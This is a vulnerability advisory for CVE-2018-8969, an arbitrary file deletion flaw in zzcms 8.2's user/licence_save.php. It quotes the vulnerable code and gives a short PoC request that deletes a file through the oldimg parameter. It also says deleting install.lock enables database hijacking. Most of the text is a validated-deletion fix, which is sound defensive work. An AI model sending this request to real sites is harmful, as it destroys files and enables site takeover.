# CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability
An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.
## user/licence_save.php

Edition: zzcms 8.2

Location: /user/licence_save.php

Code:
```php
// Vulnerable code as shipped (kept as-is): $oldimg comes straight from the request.
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
    // The path prefix is prepended, but $oldimg itself is never validated,
    // so "../" sequences walk out of the image directory.
    $f="…/".$oldimg;
    if (file_exists($f)){
        unlink($f);
    }
    // The "_small" thumbnail variant is deleted with the same unvalidated name.
    $fs="…/".str_replace(".","_small.",$oldimg)."";
    if (file_exists($fs)){
        unlink($fs);
    }
}
```
Line: 31

## Harm

Allows attackers to delete arbitrary files.

## Cause

From the code we can see that the only value we control is oldimg, and it is not filtered in any way before being passed to unlink().
1. First create test.php.
2. Then perform the modify operation, making sure the request satisfies `$oldimg<>$img && $oldimg<>"/image/nopic.gif"`.
3. Then execute the request.
4. test.php is gone.
## PoC

```
GET  http://127.0.0.1:8080/user/licence_save.php?action=modify
POST id=11&oldimg=test.php&img=1231
```
An attacker can use this vulnerability to delete any file, for example install.lock, which allows the CMS to be reinstalled and the website database to be hijacked.

## Solution

Filter the attacker-controlled input parameter: strictly restrict the parameter's type and the allowed file suffixes.
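The following is an added example of what that filtering can look like; it is not zzcms's own code and not part of the original write-up. It assumes licence images live under a fixed upload directory (`UPLOAD_DIR`, an assumed path) and that stored names are plain image file names. The name is checked against a strict pattern (no slashes, no `..`) and the resolved path is confirmed to stay inside the upload directory before `unlink()` runs, while the original `nopic.gif` and "unchanged image" checks are kept.

```php
<?php
// Added example, not zzcms code. UPLOAD_DIR is an assumed location.
const UPLOAD_DIR = '/var/www/zzcms/image/licence';

/**
 * Return the absolute path of $oldimg inside UPLOAD_DIR, or null when the
 * value is not a plain image file name that resolves inside that directory.
 */
function safe_old_image_path(string $oldimg): ?string
{
    // 1. Whitelist the name: bare file name, image suffix only.
    //    This rejects "test.php", "../../install.lock", NUL bytes, etc.
    if (!preg_match('/\A[A-Za-z0-9_\-]+\.(jpg|jpeg|png|gif)\z/i', $oldimg)) {
        return null;
    }
    // 2. Resolve both paths and confirm the file is still under UPLOAD_DIR
    //    (guards against symlinks placed in the upload directory).
    $base = realpath(UPLOAD_DIR);
    $full = realpath(UPLOAD_DIR . DIRECTORY_SEPARATOR . $oldimg);
    if ($base === false || $full === false) {
        return null; // directory or file does not exist
    }
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the upload directory
    }
    return $full;
}

/**
 * Delete the previous licence image and its "_small" thumbnail, but only
 * when the name passes validation. Mirrors the original's two guard checks.
 * Returns true if at least one file was removed.
 */
function delete_old_licence_image(string $oldimg, string $img): bool
{
    if ($oldimg === $img || $oldimg === '/image/nopic.gif') {
        return false; // nothing to delete, same as the original logic
    }
    $deleted = false;
    $candidates = [$oldimg, str_replace('.', '_small.', $oldimg)];
    foreach ($candidates as $name) {
        $path = safe_old_image_path($name);
        if ($path !== null && is_file($path)) {
            $deleted = unlink($path) || $deleted;
        }
    }
    return $deleted;
}

// Constructed inputs: the PoC value and a traversal attempt are both rejected
// by the whitelist before any filesystem call is made.
var_dump(safe_old_image_path('test.php'));
var_dump(safe_old_image_path('../../install.lock'));
var_dump(delete_old_licence_image('test.php', '1231'));
```

A stronger fix than validating the client-supplied name is to not trust it at all: look up the stored image name for the record identified by `id` from the database and delete that, so the request can never name a file the application did not itself write.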